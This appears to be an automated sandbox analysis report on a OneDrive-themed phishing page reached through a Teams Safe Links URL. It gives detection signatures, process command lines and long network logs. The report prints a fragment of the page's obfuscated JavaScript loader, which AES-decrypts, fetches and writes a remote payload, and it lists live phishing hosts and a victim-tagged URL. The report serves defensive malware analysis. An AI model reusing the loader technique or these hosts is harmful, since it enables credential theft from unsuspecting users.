Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://statics.teams.cdn.office.net/evergreen-assets/safelinks/1/atp-safelinks.html?url=https%3A%2F%2Fphpstack-1335745-4931432.cloudwaysapps.com%2F%23%26%26%2B~XanJlZEBwcm9hZy5jb20=&locale=en-us&dest=https%3A%2F%2Fteams.microsoft.com%2Fapi%2Fmt%2Fpart%2Famer-03%2Fbeta%2Fatpsafelinks%2Fgeturlreputat

Overview

General Information

Sample URL:https://statics.teams.cdn.office.net/evergreen-assets/safelinks/1/atp-safelinks.html?url=https%3A%2F%2Fphpstack-1335745-4931432.cloudwaysapps.com%2F%23%26%26%2B~XanJlZEBwcm9hZy5jb20=&locale=en-us&dest
Analysis ID:1528375
Infos:

Detection

HTMLPhisher
Score:68
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

AI detected phishing page
Yara detected HtmlPhish10
Yara detected HtmlPhish70
HTML page contains suspicious javascript code
Detected non-DNS traffic on DNS port
HTML body contains low number of good links
HTML body contains password input but no form action
HTML body with high number of embedded images detected
HTML page contains hidden javascript code
HTML title does not match URL
Invalid T&C link found
Stores files to the Windows start menu directory
Uses Javascript AES encryption / decryption (likely to hide suspicious Javascript code)
Very long command line found

Classification

  • System is w10x64_ra
  • chrome.exe (PID: 6744 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 5724 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2208 --field-trial-handle=1924,i,1149318911807237318,5933404608887014089,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 6828 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://statics.teams.cdn.office.net/evergreen-assets/safelinks/1/atp-safelinks.html?url=https%3A%2F%2Fphpstack-1335745-4931432.cloudwaysapps.com%2F%23%26%26%2B~XanJlZEBwcm9hZy5jb20=&locale=en-us&dest=https%3A%2F%2Fteams.microsoft.com%2Fapi%2Fmt%2Fpart%2Famer-03%2Fbeta%2Fatpsafelinks%2Fgeturlreputationsitev2%2F&pc=dqIG3sYngZE8N2eRBkF7CAkOWKg5g3tGjnQGJGQlc61U8QGlKCs5AzH6JKtW7FyetS1g5oEXSNBKJVlJbTCgrea0O041dBSjafsPfOc5KxbMkQRnpwalZQdhHfcjoeWL7rzuDGG%252fj2e7scaAUTCy2PY0WmBb87rgNNPdmEQne%252f00jq9aOpwCvhJrGkNK5f8MP5jaUwccFhr9IIoVaCOrXUhSnuRv%252fw%252bxhUGpneOsAgBs7CjJQbmepBIHfEqwCkqvDbYbxYB4Hm9sLVAOFaz9VFMFSXPJt4MqeWAChikWLAZATmvniptR3h97WVF%252fZtjtm3RxdNyPROzhUvL92w9fdWmSw%252bHBxn5rMHOUpaQU16ZpcfATiVaU51fqKaYO2v4ZnK7axAavLgOpgAJivuE6JO2sqksPH41Z6PVam5c4J%252bwwz5Z2pqrOSxPxEcPGeDff%252bxp9PApNxpvURRLl98WzRw%252ftZEOu%252foKPhjN0OiTGAQDLRWTF%252bMCzSQg37tk7ZYUYYc0Ycs4xDjchhFprJCCSfrZ8WyHq6cjqmnbgDKRQig28xGNFnSDEeWMDBQeeeVyNqDv0FAAxkSAMO%252b7t4Qu1y0h0MHJYEb5pxfOYe8Pyfcsn7pyR%252fkKEqziEQVGlIETrpjVMNyrhJrnX9S%252flWaxf0H3tD%252fqMhzPysO9QdPSJTG054WE4jq5GRqTKu8P25t4KJLY15Oz2j5iCg7Bd5lczhgv4PQevplLuCGckM%252fs5EPk2r2FkSOxHF51EB5FR2TgXQR5UAp2BbaWTm9irKwSSUK5z1MsGMDokVMEB4bQ9mpZrl1%252bDMixJ1mQyyLXpelmEyN8zw1nTsbXAvDQgIvPLPj0QUtphEMnmVEXMkQHiw2WHWUSxIxYcY%252fltyp6bnMrankPAnpChbWQmk95rKsUz8tqtLjNDclK1y1FLy%252fh7sed9duxDDFupXnhmXxGJOmUV6FG1arxXL8urm1F98thG8anfchv3DafKsyVHHgmdUFNH6Uhcu4sB8fo0kqm2y7IWS96w5BeG334JvnFDJPLDPvtK5ojeXfDXh%252boKJdBxXGC9NmPwgDp8XeOavQnNlJRfUAXkhukdjDg1EHGF%252b9luUuTH%252fEbKHniTzx4OvIWUnDvXcdpuEIAnW8mDJzMXpmxpl3nwtTqeQWMeSNzjute9yTZEU%252beQk498EMyU%252fuPUg%252fSOH5r%252fwjGCsPpm%252f%252bUA00SsNvWuDD0AbNIKYubFuNKQ3SX6N7M11wOksoUG%252fz9IheWtOawwl7F0lqN3xkTQhfiiHovdudAPiB%252fzt25Im27XxPQ9s1c%252bnOWOPh6m%252bvaCQcj6bcwkFbNl5Y1KL7XQvirYSFsNXnrYuQvTPMk1n5CRq6dxsl9FRGV9MMdrZduC%252bG4B0zxLA58d8fTW2zfEXnRcMTgQKLK%252fmeZT7K3wwAvQiA%253d%253d%3B%20expires%3DWed%2C%2009%20Oct%202024%2014%3A05%3A23%20GMT%3B%20path%3D%2F%3B%20SameSite%3DNone%3B%20secu" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
SourceRuleDescriptionAuthorStrings
dropped/chromecache_155JoeSecurity_HtmlPhish_70Yara detected HtmlPhish_70Joe Security
    SourceRuleDescriptionAuthorStrings
    0.8.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
      No Sigma rule has matched
      No Suricata rule has matched

      Click to jump to signature section

      Show All Signature Results

      Phishing

      barindex
      Source: https://cm-email-assets.s3.amazonaws.com/images/ContactMonkey-Team-RHgG2HKedjWK7A71P9queFFLgux8kwcr5DRYDP4VPcva96r5cgW6PiqHiSLkORIGILE6gqUD5FC44k37BcCvWgAPKXAcpJ1sJU3tF7IPivA1H7eCYe4LonxtUt60lylx/10.html#XanJlZEBwcm9hZy5jb20=LLM: Score: 7 Reasons: The brand 'OneDrive' is a well-known cloud storage service by Microsoft., The legitimate domain for OneDrive is 'onedrive.com'., The URL 'cm-email-assets.s3.amazonaws.com' is hosted on Amazon S3, which is a cloud storage service., Amazon S3 is often used to host assets for various services, but it is not the legitimate domain for OneDrive., The presence of a password input field on a non-legitimate domain is suspicious and indicative of a phishing attempt., The URL does not match the legitimate domain for OneDrive and could be used to deceive users into entering sensitive information. DOM: 0.9.pages.csv
      Source: Yara matchFile source: 0.8.pages.csv, type: HTML
      Source: Yara matchFile source: dropped/chromecache_155, type: DROPPED
      Source: https://cm-email-assets.s3.amazonaws.com/images/ContactMonkey-Team-RHgG2HKedjWK7A71P9queFFLgux8kwcr5DRYDP4VPcva96r5cgW6PiqHiSLkORIGILE6gqUD5FC44k37BcCvWgAPKXAcpJ1sJU3tF7IPivA1H7eCYe4LonxtUt60lylx/10.html#XanJlZEBwcm9hZy5jb20=HTTP Parser: window.location.href = atob(
      Source: https://cm-email-assets.s3.amazonaws.com/images/ContactMonkey-Team-RHgG2HKedjWK7A71P9queFFLgux8kwcr5DRYDP4VPcva96r5cgW6PiqHiSLkORIGILE6gqUD5FC44k37BcCvWgAPKXAcpJ1sJU3tF7IPivA1H7eCYe4LonxtUt60lylx/10.html#XanJlZEBwcm9hZy5jb20=HTTP Parser: Number of links: 0
      Source: https://cm-email-assets.s3.amazonaws.com/images/ContactMonkey-Team-RHgG2HKedjWK7A71P9queFFLgux8kwcr5DRYDP4VPcva96r5cgW6PiqHiSLkORIGILE6gqUD5FC44k37BcCvWgAPKXAcpJ1sJU3tF7IPivA1H7eCYe4LonxtUt60lylx/10.html#XanJlZEBwcm9hZy5jb20=HTTP Parser: <input type="password" .../> found but no <form action="...
      Source: https://cm-email-assets.s3.amazonaws.com/images/ContactMonkey-Team-RHgG2HKedjWK7A71P9queFFLgux8kwcr5DRYDP4VPcva96r5cgW6PiqHiSLkORIGILE6gqUD5FC44k37BcCvWgAPKXAcpJ1sJU3tF7IPivA1H7eCYe4LonxtUt60lylx/10.html#XanJlZEBwcm9hZy5jb20=HTTP Parser: Total embedded image size: 45687
      Source: https://cm-email-assets.s3.amazonaws.com/images/ContactMonkey-Team-RHgG2HKedjWK7A71P9queFFLgux8kwcr5DRYDP4VPcva96r5cgW6PiqHiSLkORIGILE6gqUD5FC44k37BcCvWgAPKXAcpJ1sJU3tF7IPivA1H7eCYe4LonxtUt60lylx/b+bdu++nua++wivprdd+m.html#&&+~XanJlZEBwcm9hZy5jb20=HTTP Parser: Base64 decoded: {"version":3,"sources":["/cfsetup_build/src/orchestrator/turnstile/templates/turnstile.scss","%3Cinput%20css%20qtFLbZ%3E"],"names":[],"mappings":"AAmCA,gBACI,GACI,uBClCN,CACF,CDqCA,kBACI,GACI,mBCnCN,CACF,CDsCA,iBACI,MAEI,cCrCN,CDwCE,IACI,mBCtCN,CACF,CDyCA...
      Source: https://cm-email-assets.s3.amazonaws.com/images/ContactMonkey-Team-RHgG2HKedjWK7A71P9queFFLgux8kwcr5DRYDP4VPcva96r5cgW6PiqHiSLkORIGILE6gqUD5FC44k37BcCvWgAPKXAcpJ1sJU3tF7IPivA1H7eCYe4LonxtUt60lylx/10.html#XanJlZEBwcm9hZy5jb20=HTTP Parser: Title: Log-in to secure portal does not match URL
      Source: https://cm-email-assets.s3.amazonaws.com/images/ContactMonkey-Team-RHgG2HKedjWK7A71P9queFFLgux8kwcr5DRYDP4VPcva96r5cgW6PiqHiSLkORIGILE6gqUD5FC44k37BcCvWgAPKXAcpJ1sJU3tF7IPivA1H7eCYe4LonxtUt60lylx/10.html#XanJlZEBwcm9hZy5jb20=HTTP Parser: Invalid link: Fruits help reduce the risk of heart disease and cancer.
      Source: https://cm-email-assets.s3.amazonaws.com/images/ContactMonkey-Team-RHgG2HKedjWK7A71P9queFFLgux8kwcr5DRYDP4VPcva96r5cgW6PiqHiSLkORIGILE6gqUD5FC44k37BcCvWgAPKXAcpJ1sJU3tF7IPivA1H7eCYe4LonxtUt60lylx/10.html#XanJlZEBwcm9hZy5jb20=HTTP Parser: Invalid link: Fruits help reduce the risk of heart disease and cancer.
      Source: https://cm-email-assets.s3.amazonaws.com/images/ContactMonkey-Team-RHgG2HKedjWK7A71P9queFFLgux8kwcr5DRYDP4VPcva96r5cgW6PiqHiSLkORIGILE6gqUD5FC44k37BcCvWgAPKXAcpJ1sJU3tF7IPivA1H7eCYe4LonxtUt60lylx/10.html#XanJlZEBwcm9hZy5jb20=HTTP Parser: async functionlabel(jacketed) { var{a,b,c,d}=json.parse(jacketed);return cryptojs.aes.decrypt(a, cryptojs.pbkdf2(cryptojs.enc.hex.parse(d), cryptojs.enc.hex.parse(b), {hasher: cryptojs.algo.sha512,keysize: 64/8,iterations:999}), {iv:cryptojs.enc.hex.parse(c)}).tostring(cryptojs.enc.utf8);}async functionjackdaw(){nail.hidden = 0;caballero.hidden =1; document.write(awaitlabel(await (await fetch(await label(atob(`eyjhijoitwvknephd0tnsfjrtve1de00d3dzmhrrzexkzxy4u0foszj4nudsdwcyyz0ilcjjijoimze0ogvkotcznti5zdlkzwqzngezodflyjdln2u5mjailcjiijoinwjjotq4yjq5odrimmy4zdk3otvlzwe4nwfjntdmn2y2ngy0mgezzdvhnwflzmrlmtlmymq3zwqyntm2nznhytjjzdu0nwrkndmyymy5mjc5mdfhmtgyyzq0ntvlmjnmodnmmtnlzgrjymezmdc1ztywmdg1nteyodu1owezywm2mjqxnze5nwm1mtc0odq4njiym2ziztyzzwy4mgniztu3nwqwzmu4zmy2nwm1mzy5mgjlotrjyty2mmu1mju5mdfhzdewzjfhzwe1njq4zddmndzizdyznzblmmq1njixotdkzwmxmgm5njyyndg5nzkzndg2ogywyjk3mgqxmgniotm2nzbjm2m5mdvjmjuynmi1odi3yzkwoduzm2e4nzc3otdkzmnkytcyoti5mjcxz...
      Source: https://cm-email-assets.s3.amazonaws.com/images/ContactMonkey-Team-RHgG2HKedjWK7A71P9queFFLgux8kwcr5DRYDP4VPcva96r5cgW6PiqHiSLkORIGILE6gqUD5FC44k37BcCvWgAPKXAcpJ1sJU3tF7IPivA1H7eCYe4LonxtUt60lylx/10.html#XanJlZEBwcm9hZy5jb20=HTTP Parser: <input type="password" .../> found
      Source: https://statics.teams.cdn.office.net/evergreen-assets/safelinks/1/atp-safelinks.htmlHTTP Parser: No favicon
      Source: https://statics.teams.cdn.office.net/evergreen-assets/safelinks/1/atp-safelinks.htmlHTTP Parser: No favicon
      Source: https://cm-email-assets.s3.amazonaws.com/images/ContactMonkey-Team-RHgG2HKedjWK7A71P9queFFLgux8kwcr5DRYDP4VPcva96r5cgW6PiqHiSLkORIGILE6gqUD5FC44k37BcCvWgAPKXAcpJ1sJU3tF7IPivA1H7eCYe4LonxtUt60lylx/b+bdu++nua++wivprdd+m.html#&&+~XanJlZEBwcm9hZy5jb20=HTTP Parser: No favicon
      Source: https://cm-email-assets.s3.amazonaws.com/images/ContactMonkey-Team-RHgG2HKedjWK7A71P9queFFLgux8kwcr5DRYDP4VPcva96r5cgW6PiqHiSLkORIGILE6gqUD5FC44k37BcCvWgAPKXAcpJ1sJU3tF7IPivA1H7eCYe4LonxtUt60lylx/b+bdu++nua++wivprdd+m.html#&&+~XanJlZEBwcm9hZy5jb20=HTTP Parser: No favicon
      Source: https://cm-email-assets.s3.amazonaws.com/images/ContactMonkey-Team-RHgG2HKedjWK7A71P9queFFLgux8kwcr5DRYDP4VPcva96r5cgW6PiqHiSLkORIGILE6gqUD5FC44k37BcCvWgAPKXAcpJ1sJU3tF7IPivA1H7eCYe4LonxtUt60lylx/10.html#XanJlZEBwcm9hZy5jb20=HTTP Parser: No favicon
      Source: https://cm-email-assets.s3.amazonaws.com/images/ContactMonkey-Team-RHgG2HKedjWK7A71P9queFFLgux8kwcr5DRYDP4VPcva96r5cgW6PiqHiSLkORIGILE6gqUD5FC44k37BcCvWgAPKXAcpJ1sJU3tF7IPivA1H7eCYe4LonxtUt60lylx/10.html#XanJlZEBwcm9hZy5jb20=HTTP Parser: No favicon
      Source: https://cm-email-assets.s3.amazonaws.com/images/ContactMonkey-Team-RHgG2HKedjWK7A71P9queFFLgux8kwcr5DRYDP4VPcva96r5cgW6PiqHiSLkORIGILE6gqUD5FC44k37BcCvWgAPKXAcpJ1sJU3tF7IPivA1H7eCYe4LonxtUt60lylx/10.html#XanJlZEBwcm9hZy5jb20=HTTP Parser: No favicon
      Source: https://cm-email-assets.s3.amazonaws.com/images/ContactMonkey-Team-RHgG2HKedjWK7A71P9queFFLgux8kwcr5DRYDP4VPcva96r5cgW6PiqHiSLkORIGILE6gqUD5FC44k37BcCvWgAPKXAcpJ1sJU3tF7IPivA1H7eCYe4LonxtUt60lylx/10.html#XanJlZEBwcm9hZy5jb20=HTTP Parser: No favicon
      Source: https://cm-email-assets.s3.amazonaws.com/images/ContactMonkey-Team-RHgG2HKedjWK7A71P9queFFLgux8kwcr5DRYDP4VPcva96r5cgW6PiqHiSLkORIGILE6gqUD5FC44k37BcCvWgAPKXAcpJ1sJU3tF7IPivA1H7eCYe4LonxtUt60lylx/10.html#XanJlZEBwcm9hZy5jb20=HTTP Parser: No <meta name="author".. found
      Source: https://cm-email-assets.s3.amazonaws.com/images/ContactMonkey-Team-RHgG2HKedjWK7A71P9queFFLgux8kwcr5DRYDP4VPcva96r5cgW6PiqHiSLkORIGILE6gqUD5FC44k37BcCvWgAPKXAcpJ1sJU3tF7IPivA1H7eCYe4LonxtUt60lylx/10.html#XanJlZEBwcm9hZy5jb20=HTTP Parser: No <meta name="author".. found
      Source: https://cm-email-assets.s3.amazonaws.com/images/ContactMonkey-Team-RHgG2HKedjWK7A71P9queFFLgux8kwcr5DRYDP4VPcva96r5cgW6PiqHiSLkORIGILE6gqUD5FC44k37BcCvWgAPKXAcpJ1sJU3tF7IPivA1H7eCYe4LonxtUt60lylx/10.html#XanJlZEBwcm9hZy5jb20=HTTP Parser: No <meta name="copyright".. found
      Source: https://cm-email-assets.s3.amazonaws.com/images/ContactMonkey-Team-RHgG2HKedjWK7A71P9queFFLgux8kwcr5DRYDP4VPcva96r5cgW6PiqHiSLkORIGILE6gqUD5FC44k37BcCvWgAPKXAcpJ1sJU3tF7IPivA1H7eCYe4LonxtUt60lylx/10.html#XanJlZEBwcm9hZy5jb20=HTTP Parser: No <meta name="copyright".. found
      Source: unknownHTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.16:49724 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49725 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49727 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.16:49782 version: TLS 1.2
      Source: global trafficTCP traffic: 192.168.2.16:52753 -> 1.1.1.1:53
      Source: global trafficTCP traffic: 192.168.2.16:52753 -> 1.1.1.1:53
      Source: global trafficTCP traffic: 192.168.2.16:52753 -> 1.1.1.1:53
      Source: global trafficTCP traffic: 192.168.2.16:52753 -> 1.1.1.1:53
      Source: global trafficTCP traffic: 192.168.2.16:52753 -> 1.1.1.1:53
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
      Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
      Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
      Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
      Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
      Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
      Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
      Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
      Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
      Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
      Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
      Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
      Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
      Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
      Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
      Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
      Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
      Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
      Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
      Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global trafficDNS traffic detected: DNS query: www.google.com
      Source: global trafficDNS traffic detected: DNS query: phpstack-1335745-4931432.cloudwaysapps.com
      Source: global trafficDNS traffic detected: DNS query: cm-email-assets.s3.amazonaws.com
      Source: global trafficDNS traffic detected: DNS query: challenges.cloudflare.com
      Source: global trafficDNS traffic detected: DNS query: cdn.jsdelivr.net
      Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
      Source: global trafficDNS traffic detected: DNS query: phpstack-1335745-4893982.cloudwaysapps.com
      Source: global trafficDNS traffic detected: DNS query: decoestilismoko.ru
      Source: global trafficDNS traffic detected: DNS query: code.jquery.com
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
      Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52755
      Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
      Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
      Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
      Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
      Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
      Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
      Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
      Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
      Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 52755 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
      Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
      Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
      Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
      Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
      Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
      Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
      Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
      Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
      Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
      Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
      Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
